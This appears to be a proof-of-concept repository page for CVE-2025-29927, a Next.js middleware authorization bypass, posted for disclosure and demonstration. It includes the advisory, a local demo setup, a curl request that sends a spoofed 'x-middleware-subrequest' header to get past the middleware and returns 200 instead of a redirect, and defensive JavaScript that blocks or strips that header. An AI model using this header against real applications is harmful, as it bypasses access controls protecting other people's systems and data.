
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Demo for Next.js middleware bypass - CVE-2025-29927
Readme
# CVE-2025-29927 Demo

Original writeup: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

## Setup

First, run the development server:

```bash
npm i
npm run dev
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.

## Trying out the bypass

`curl -I http://localhost:3000`

```http
HTTP/1.1 307 Temporary Redirect
location: /403
Date: Mon, 24 Mar 2025 08:02:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```

`curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000`

```http
HTTP/1.1 200 OK
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
link: </_next/static/media/569ce4b8f30dc480-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/media/93f479601ee12b01-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/css/app/layout.css?v=1742803407039>; rel=preload; as="style"
Cache-Control: no-store, must-revalidate
X-Powered-By: Next.js
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Mar 2025 08:03:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```
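The advisory above recommends, as an interim mitigation, preventing external requests that carry the `x-middleware-subrequest` header from reaching the application. The following is an added example (not code from the PoC repository or from Next.js) of such an edge filter in Node.js: a case-insensitive header check, a Connect/Express-style handler that rejects the request with 403 and logs it for detection, and a header-stripping variant for proxies that must forward the request. The handler's mount point and the sample requests are constructed for illustration.

```javascript
// Added example: edge-side guard for CVE-2025-29927 (not part of the original PoC).
// Assumes it runs in a reverse proxy or API gateway in front of the Next.js app,
// on Node.js IncomingMessage-like objects or plain header maps.
const BLOCKED_HEADER = 'x-middleware-subrequest';

// True if the header is present under any capitalisation. Node's http parser
// lower-cases header names, but raw maps from other sources may not.
function hasMiddlewareSubrequestHeader(headers) {
  return Object.keys(headers || {}).some((k) => k.toLowerCase() === BLOCKED_HEADER);
}

// 'block' = reject at the edge, 'allow' = forward unchanged. The header value is
// irrelevant to the decision: no legitimate external client should send it at all.
function classifyRequest(req) {
  return hasMiddlewareSubrequestHeader(req.headers) ? 'block' : 'allow';
}

// Connect/Express-style handler (hypothetical mount point). Rejecting rather than
// silently stripping leaves an audit trail that detection rules can key on.
function middlewareSubrequestGuard(req, res, next) {
  if (classifyRequest(req) === 'block') {
    const src = req.socket && req.socket.remoteAddress ? req.socket.remoteAddress : 'unknown';
    console.warn(`[CVE-2025-29927] blocked ${req.method} ${req.url} from ${src}`);
    res.statusCode = 403;
    res.setHeader('Content-Type', 'text/plain');
    res.end('Forbidden');
    return;
  }
  next();
}

// Variant for a forwarding proxy: return a copy of the headers with the
// dangerous header removed so the internal recursion guard cannot be spoofed.
function stripMiddlewareSubrequestHeader(headers) {
  const clean = {};
  for (const [k, v] of Object.entries(headers || {})) {
    if (k.toLowerCase() !== BLOCKED_HEADER) clean[k] = v;
  }
  return clean;
}

// Constructed sample requests mirroring the two curl calls in the README.
const benignRequest = {
  method: 'GET', url: '/',
  headers: { host: 'localhost:3000', 'user-agent': 'curl/8.0' },
};
const bypassAttempt = {
  method: 'GET', url: '/',
  headers: { host: 'localhost:3000', 'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware' },
};
```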
File Snapshot

```
[4.0K] /data/pocs/cf26b64aa90d787a4a95449422d116596e27cfb3
├── [ 393] eslint.config.mjs
├── [1.0K] LICENSE
├── [ 133] next.config.ts
├── [ 568] package.json
├── [323K] package-lock.json
├── [  81] postcss.config.mjs
├── [4.0K] public
│   ├── [ 391] file.svg
│   ├── [1.0K] globe.svg
│   ├── [1.3K] next.svg
│   ├── [ 128] vercel.svg
│   └── [ 385] window.svg
├── [1.2K] README.md
├── [4.0K] src
│   ├── [4.0K] app
│   │   ├── [4.0K] 403
│   │   │   └── [ 640] page.tsx
│   │   ├── [ 25K] favicon.ico
│   │   ├── [ 488] globals.css
│   │   ├── [ 689] layout.tsx
│   │   └── [ 433] page.tsx
│   └── [ 662] middleware.ts
└── [ 602] tsconfig.json

4 directories, 19 files
```